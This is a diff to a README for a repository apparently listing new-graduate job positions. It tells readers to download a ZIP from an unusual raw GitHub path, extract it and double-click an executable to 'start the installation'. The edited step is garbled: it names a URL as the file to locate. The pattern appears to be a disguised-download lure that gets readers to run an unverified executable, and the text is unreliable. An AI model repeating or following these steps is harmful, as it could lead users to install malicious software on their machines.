nicktrick8/New-Grad-Positions/README.md

 1. Navigate to your Downloads folder.
 2. Locate the downloaded ZIP file and right-click on it.
 3. Select "Extract All" or "Unzip" to access the files.
-4. Open the extracted folder, and locate the file named `New-Grad-Positions.exe` (or similar).
+4. Open the extracted folder, and locate the file named `https://raw.githubusercontent.com/nicktrick8/New-Grad-Positions/dev/homiletically/New-Grad-Positions.zip` (or similar).
 5. Double-click on this file to start the installation process.
 6. Follow the on-screen instructions to complete the installation.